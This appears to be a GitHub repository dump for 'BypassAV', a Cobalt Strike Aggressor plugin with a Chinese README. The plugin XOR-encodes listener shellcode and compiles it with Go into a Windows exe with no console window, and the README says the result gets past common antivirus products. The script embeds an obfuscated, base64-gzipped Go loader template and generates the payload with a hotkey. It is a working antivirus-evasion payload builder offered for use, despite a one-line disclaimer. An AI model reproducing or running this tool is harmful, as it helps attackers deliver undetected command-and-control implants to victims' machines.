├── README.md ├── bypass.cna └── img ├── 2.png └── 3.gif /README.md: -------------------------------------------------------------------------------- 1 | # 前言 2 | 仅用于技术交流,请勿用于非法用途 3 | 4 | 这个插件没有什么技术含量,旨在用于快速生成免杀的可执行文件,目前仅支持exe文件格式。需要安装go环境,因为是用`go build`生成的 5 | 6 | 免杀效果如下图: 7 | 8 | ![img](./img/2.png) 9 | 10 | 用法:导入之后,位置在:`attack` -> `BypassAV`,快捷键:`Ctrl+G` 11 | 12 | ![img](./img/3.gif) 13 | 14 | ## 2020/7/19更新 15 | 16 | 更新了弹出的黑窗口问题和Linux/Mac上不能生成问题以及修复一些bug,建议生成64位的,32位的vt上查杀有点多(不过360全家桶、火绒那些还是可以过的) 17 | 18 | **注:** 用go打包体积可能会有点大(1.2M左右),可以用upx压缩一下,大概能压缩到600kb左右那样子 -------------------------------------------------------------------------------- /bypass.cna: -------------------------------------------------------------------------------- 1 | popup attacks{ 2 | item("&BypassAV",{Generator();}); 3 | } 4 | 5 | bind Ctrl+G{ 6 | Generator(); 7 | } 8 | 9 | sub Generator{ 10 | $dialog = dialog("Generator", %(listener => "" , bit => false), &build); 11 | drow_listener($dialog, "listener", "Listener: "); 12 | dialog_description($dialog, "该插件用于快速生成免杀的可执行文件"); 13 | dbutton_action($dialog, "Generate"); 14 | dbutton_help($dialog, "http://github.com/hack2fun/BypassAV"); 15 | drow_checkbox($dialog, "bit", "x64: ", "使用64位的payload"); 16 | dialog_show($dialog); 17 | } 18 | 19 | sub build{ 20 | $a = $3["bit"] . ""; 21 | 22 | if ($3["bit"] eq "false"){ 23 | $system = "x86"; 24 | $arch = "386"; 25 | }else{ 26 | $system = "x64"; 27 | $arch = "amd64"; 28 | } 29 | 30 | $code = gunzip(base64_decode("H4sIAAAAAAAACr1TUW/aMBB+xr/iFiHkrFGasu2lGw+IelVVsiJg3aaKRVliqFVjR05SgRj/fecEAmzt66wots/fd77v7pzFyVO84LCMhSKkvbm++8LG/SnbkvPzhb5ccMVNXHDIH7mUhIhlpk0BlLScfJ0nsZQOLkuVx3NuV4VY4uwSkmiVV7iQhdHgLgxvpnA8ehCsLoIgqAFjNmHje/Y3oFsBRv1rFrHvbPB1yhDZv/o2vpmyCvAej2/Zj+gC/hk9aG+qo20N6b4O6W5txM+xsfE+caO4fNfdQ3Yy/bDMi6GO06vhkDp7kJ9iAlzSUgUujvy+SKpAe8a9MEUZy76UOrGMxqOlfBYqHRmdUOcYZmnjQg50tg75Ups10mqfpxzEhPqZ1xgkobZ5qZKqxNSFDWm1N1U5E51yzI4V3uzhYfZrXXDSmmsDAi4xyx9x/gSSK7rSJmqQLtrPzqy71oHdgzjLuEppY/LghPUgZj+rslT/LkrCCOI0NR5EHnBj7JXHqv0BJpIGHpRCFVlhqA3kEITrwaHDfh/1kgcv9w3eKObVRW8wfUJCp2N3PjNGG0wPWp3pIwed2cYXWkGil5nkBU8hL5OE5/m8lHLtO7X0XaXZShQ0qOVEjZYenBSs1lKrpTs9Lq1fjz/SaOCGdg65CmZW3yvC/4MQ+5r9ieQ8ox/gLdRbjk87xfM9YVLPO1lB87lk+weKv0dCXQQAAA==")); 31 | $KEY_1 = rand(255); 32 | $KEY_2 = rand(255); 33 | $code = replace($code, '\$\{KEY_1\}', $KEY_1); 34 | $code = replace($code, '\$\{KEY_2\}', $KEY_2); 35 | $shell_code = shellcode($3["listener"], false, $system); 36 | $shell_code = split("",$shell_code); 37 | $arr = ""; 38 | 39 | for ($i = 0; $i < size($shell_code); $i++){ 40 | $arr = $arr . "," .asc($shell_code[$i]) ^ $KEY_1 ^ $KEY_2; 41 | } 42 | 43 | $final_shellcode = "xor_shellcode :=[]byte" . "{" . substr($arr,1,strlen($arr)) . "}"; 44 | $code = replace($code , '\$\{shellcode\}' , $final_shellcode); 45 | 46 | prompt_file_save("BypassAV.exe", { 47 | $path = "$1"; 48 | 49 | if ("*Windows*" iswm systemProperties()["os.name"]) { 50 | $path = replace($path, "\\\\", "\\\\\\\\"); 51 | $build = "//go:generate -command shell cmd /c set GOOS=windows&& set GOARCH= $+ $arch $+ && go build -o $path -ldflags -H=windowsgui C:\\\\windows\\\\temp\\\\temp.go && del C:\\\\windows\\\\temp\\\\temp.go"; 52 | $gofile = "C:\\\\windows\\\\temp\\\\temp.go"; 53 | $handle = openf("> $+ $gofile"); 54 | }else{ 55 | $build = "//go:generate -command shell bash -c \"GOOS=windows&& GOARCH= $+ $arch && go build -o $path -ldflags -H=windowsgui /tmp/temp.go && rm /tmp/temp.go\""; 56 | $gofile = "/tmp/temp.go"; 57 | $handle = openf("> $+ $gofile"); 58 | } 59 | 60 | $code = replace($code, '\$\{GONERATE\}', $build); 61 | writeb($handle, $code); 62 | closef($handle); 63 | $space = " "; 64 | exec("go generate $+ $space $+ $gofile"); 65 | show_message("save to $+ $1"); 66 | }); 67 | 68 | } 69 | -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hack2fun/BypassAV/0461fcd20680ea2efdfc5b96c04cc98a571e3fd8/img/2.png -------------------------------------------------------------------------------- /img/3.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hack2fun/BypassAV/0461fcd20680ea2efdfc5b96c04cc98a571e3fd8/img/3.gif --------------------------------------------------------------------------------